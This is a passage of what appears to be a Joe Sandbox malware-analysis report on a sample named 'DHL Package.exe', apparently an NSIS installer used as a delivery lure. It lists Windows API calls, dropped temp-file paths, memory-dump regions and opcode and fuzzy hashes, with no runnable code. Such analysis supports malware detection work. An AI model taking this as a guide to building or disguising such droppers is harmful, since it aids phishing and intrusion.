                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-3355392842
                                                                                                • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                • Instruction ID: ab420094dca872cde134391ad8eb9d2612fe0bdf2854729f0df44d947378a899
                                                                                                • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                • Instruction Fuzzy Hash: 0FD0A771101A30AAC1116B499D04DEF72ACEE85304741003FF641B30A0CB7C5D5297FD
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 0040268D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp$C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll
                                                                                                • API String ID: 1659193697-888978176
                                                                                                • Opcode ID: 1aa389ca015f2fdce485474ac031c077b765c667c8b0e0131096f0f56d463f70
                                                                                                • Instruction ID: 875d7668fd04ab2c3476ce7c04c1792ac9cb57cc586ecbb2cfc4c12127aa1763
                                                                                                • Opcode Fuzzy Hash: 1aa389ca015f2fdce485474ac031c077b765c667c8b0e0131096f0f56d463f70
                                                                                                • Instruction Fuzzy Hash: A8110D71A10205ABCB00AFB18E4E99E7771DF55744F61443FF402F61C1E6FD8851565E
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                                • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                                                • Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
                                                                                                • Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                                                • Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD
                                                                                                APIs
                                                                                                  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                  • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
                                                                                                  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
                                                                                                  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
                                                                                                • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E11
                                                                                                • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\), ref: 00405E21
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DB8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 3248276644-3355392842
                                                                                                • Opcode ID: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                                                • Instruction ID: 2671ab18330f60560c3719f84a1496f0714d5bb9fce48f62cd6cce0e1185a57b
                                                                                                • Opcode Fuzzy Hash: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                                                • Instruction Fuzzy Hash: FAF0F935108E6156D621333A6D0D6AF2504CE82364756853FFC52B12D5DF3C89539DBE
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 004053E6
                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405437
                                                                                                  • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                                                • Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
                                                                                                • Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                                                • Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,77163420,00000000,C:\Users\user\AppData\Local\Temp\,004039ED,00403803,00000007,?,00000007,00000009,0000000B), ref: 00403A2F
                                                                                                • GlobalFree.KERNEL32(?), ref: 00403A36
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A15
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$GlobalLibrary
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1100898210-3355392842
                                                                                                • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                • Instruction ID: e31a7033e06264a748858091d27326a34299cb79b9d6c3cb96cb008d14d5ef43
                                                                                                • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                • Instruction Fuzzy Hash: 53E0EC36A511205BC7219F45AA0875E7BADAF58B22F05012AE8857B27087745C824F98
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Package.exe,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D02
                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Package.exe,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D12
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-3370423016
                                                                                                • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                • Instruction ID: 6b3ae82466a78d2b10de00fa1d507c540e6bf26c2d05194e9d44ea340b0cb8a4
                                                                                                • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                • Instruction Fuzzy Hash: 48D05EB24109209AC3126705EC089AF67A8EF5130074A842BF841A61A5D7785C8186AC
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6CA7116A
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA711C7
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA711D9
                                                                                                • GlobalFree.KERNEL32(?), ref: 6CA71203
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1780285237-0
                                                                                                • Opcode ID: 0f30d68671f232ef4e0574f71acfebff644934e78f8b83cd4f61e6478610fe5f
                                                                                                • Instruction ID: 36afac928cd0a871069db0453d9cadde56ad89c26c6a99e572a05282590134ab
                                                                                                • Opcode Fuzzy Hash: 0f30d68671f232ef4e0574f71acfebff644934e78f8b83cd4f61e6478610fe5f
                                                                                                • Instruction Fuzzy Hash: FD31E6BE6013129FDB258F68C96993577F8FB06314714452DEA49DBA10E734D88787B0
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
                                                                                                • CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                • Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                • Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N
                                                                                                • API String ID: 0-1130791706
                                                                                                • Opcode ID: 0f0042e4018f4b474191dd8251a34390fb56a9280db3d9894ea472268f717023
                                                                                                • Instruction ID: 49bbba97aafc8352c1b0e9a0658720fb080e8dc15fd49ac859404712d6c43250
                                                                                                • Opcode Fuzzy Hash: 0f0042e4018f4b474191dd8251a34390fb56a9280db3d9894ea472268f717023
                                                                                                • Instruction Fuzzy Hash: 9573F471C1475A8EDB11EFA8C844A99F7B1FF99304F51C6DAE05867221EB70AAC4CF81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: poq$;<(:^
                                                                                                • API String ID: 0-1050436853
                                                                                                • Opcode ID: 77d6534e7c76f8c76f29be961b44bdc5881899ea677b9fac58d7c9636b87cf0b
                                                                                                • Instruction ID: 882f1045d6d2f9dea9eb55599a52dd6ce89cfc15e43683d5ff065958837d5da8
                                                                                                • Opcode Fuzzy Hash: 77d6534e7c76f8c76f29be961b44bdc5881899ea677b9fac58d7c9636b87cf0b
                                                                                                • Instruction Fuzzy Hash: F8E20B38945215DFDB25DF24D840A9AFBF5FF89302F1482ADD819AB361CB349A91CF84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Plq$wtq
                                                                                                • API String ID: 0-481506135
                                                                                                • Opcode ID: 1c928a5f81b678c6d86948cafb5c258d2aa25114a00d89599de6ce162f706920
                                                                                                • Instruction ID: a4454e3dcf206207af0104f70d914d72a3877a9b6445e1d9549d44c2b6d33a37
                                                                                                • Opcode Fuzzy Hash: 1c928a5f81b678c6d86948cafb5c258d2aa25114a00d89599de6ce162f706920
                                                                                                • Instruction Fuzzy Hash: B7C1C0B1D09389CFCB06DFA4C4904ADBBB1EF56396B14449AD860EF2A2D7344D0ECB65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 9476a9364d3a71a30f1daea08bb284ae954155e750b069c97e32bb9920f3e96b
                                                                                                • Instruction ID: 4a6afd7fc4c95b033b2f9f608fe3a910d6fe7a0d4410846a43b1fce942367e82
                                                                                                • Opcode Fuzzy Hash: 9476a9364d3a71a30f1daea08bb284ae954155e750b069c97e32bb9920f3e96b
                                                                                                • Instruction Fuzzy Hash: 0D129E70A002158FDB14CF68C854AAEBBF6BFC9301F658169E855EB391EF349D45CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 61e291e999aef0fe2b455838ebfa155817b3ff02535c0f2298c95838ac4a808e
                                                                                                • Instruction ID: 3c724fd262b3bb8254a376532108fb5bc84d79c1129b6352c702099d350439bb
                                                                                                • Opcode Fuzzy Hash: 61e291e999aef0fe2b455838ebfa155817b3ff02535c0f2298c95838ac4a808e
                                                                                                • Instruction Fuzzy Hash: D7F1C5B4E01228CFEB14DFA9C884B9DFBB2BF88304F5481A9D409AB355DB749985CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c86efebfe3440357e362425c37e91e308a187f950d7f09ffc270a5cfe2008ceb
                                                                                                • Instruction ID: 179e61139ffb36f18ef420c2892edeeca4b5f6bec3b10e686c09a3342b679c24
                                                                                                • Opcode Fuzzy Hash: c86efebfe3440357e362425c37e91e308a187f950d7f09ffc270a5cfe2008ceb
                                                                                                • Instruction Fuzzy Hash: FB826D74A012289FEBA4DF65CD95BDDBBB2BF89300F1081E9D809A7261DB345E81CF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e2cf35e7058f708d47f8fde7c15d3b454241a8c16ae2cc17d01fa367af3c81d0
                                                                                                • Instruction ID: def06717b0e820af1a182918240e86ba6c7597bfc8e4511f229fab9c63d9c5e3
                                                                                                • Opcode Fuzzy Hash: e2cf35e7058f708d47f8fde7c15d3b454241a8c16ae2cc17d01fa367af3c81d0
                                                                                                • Instruction Fuzzy Hash: 6D72B174E01228CFEB64DF65C980BDDBBB2BB89305F5481E9D819AB251D7349E86CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cd47e4751d6d346901606181410ca68b64c30f9dc1efb4b72141c0fd88ccd034
                                                                                                • Instruction ID: 6ec9d4fd292af68666a672fbb6fcd686d0a7a18a46ccba834330e38c5bce1a11
                                                                                                • Opcode Fuzzy Hash: cd47e4751d6d346901606181410ca68b64c30f9dc1efb4b72141c0fd88ccd034
                                                                                                • Instruction Fuzzy Hash: FF025E35A00209DFDB14CFA8C844AAEBBB2FF89341F958469E865AB261D734DC45CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0c028a46fda0894e0262a4acd0725cf62763a4771f1058fff5281eb4768c3e6
                                                                                                • Instruction ID: 3683b53e8558054d985b8a59f21518142991c55846023c0dee8d2bd7da041a3e
                                                                                                • Opcode Fuzzy Hash: b0c028a46fda0894e0262a4acd0725cf62763a4771f1058fff5281eb4768c3e6
                                                                                                • Instruction Fuzzy Hash: B2E1FA75E04618CFDB14CFA9C884A9DBBF1BF89311F158069E819AB362DB30AC45CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aeeee74b12b4e32acbaf7a31a5a98f7e1efde701f9402a5329c3cfdebd96fc61
                                                                                                • Instruction ID: ed2a06bfc52de32714ca7a81f23bb651a8be09d825e0bc0f4ccc7cea64b3f8da
                                                                                                • Opcode Fuzzy Hash: aeeee74b12b4e32acbaf7a31a5a98f7e1efde701f9402a5329c3cfdebd96fc61
                                                                                                • Instruction Fuzzy Hash: B6E1C5B4E01218CFEB54DFA5C894B9DBBB2BF89304F1081AAD408B7395DB355A85CF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
